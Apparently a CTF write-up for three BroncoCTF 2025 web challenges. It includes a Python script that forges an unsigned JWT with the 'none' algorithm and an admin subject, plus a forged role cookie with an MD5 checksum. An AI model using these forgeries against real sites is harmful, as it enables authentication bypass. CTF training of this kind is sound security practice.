BroncoCTF 2025-web

Web

Miku’s Autograph

I am so proud of the fact that I have Miku's autograph. Ha! You don't!

抓包后会看到post发包会有jwt，找不到密钥，两个思路，hs256改为none或者爆破，写脚本伪造

import base64
import json

def decode_base64_url(data):
    padding = '=' * (4 - len(data) % 4)
    data += padding
    return base64.urlsafe_b64decode(data).decode('utf-8')

def encode_base64_url(data):
    return base64.urlsafe_b64encode(data.encode('utf-8')).decode('utf-8').rstrip("=")

jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJtaWt1X3VzZXIiLCJleHAiOjE3Mzk2NzM0NjN9.USsKqV_yU6R8IvogP_GaKLJuQAJNNIttd2AqAj_TRm8"
header, payload, signature = jwt_token.split('.')

decoded_header = json.loads(decode_base64_url(header))
decoded_payload = json.loads(decode_base64_url(payload))

# 修改Header中的算法为"none"
decoded_header['alg'] = 'none'

decoded_payload['sub'] = 'miku_admin'

new_header = encode_base64_url(json.dumps(decoded_header))
new_payload = encode_base64_url(json.dumps(decoded_payload))

new_jwt = f"{new_header}.{new_payload}."
print("New JWT:", new_jwt)

Grandma’s Secret Recipe

Grandma has been baking her world-famous cookies for decades, but she’s always kept her secret recipe locked away. Nobody—not even her most trusted kitchen helpers—knows the full list of ingredients.

She insists it’s all about "the perfect balance of love and a pinch of mystery", but deep down, you know there’s more to it. Rumors say only Grandma herself is allowed to see the recipe, hidden somewhere in her kitchen.

But, you were hired by Grandpa, who divorced her because she refused to share the recipe. Can you figure out the true secret behind her legendary cookies? 🍪👵

抓包看cookie的内容是helper后面还有checksum的数值，前端要求是grandma,为cookie+md5的伪造

Cookie:role="grandma";checksum="a5d19cdd5fd1a8f664c0ee2b5e293167"

Mary’s Lamb is a Little Phreak

I have this friend mary who has a lamb that only responds to a specific dial tone. Can you help mary find her lamb?

队友真神吧，我浏览器反正没搜到。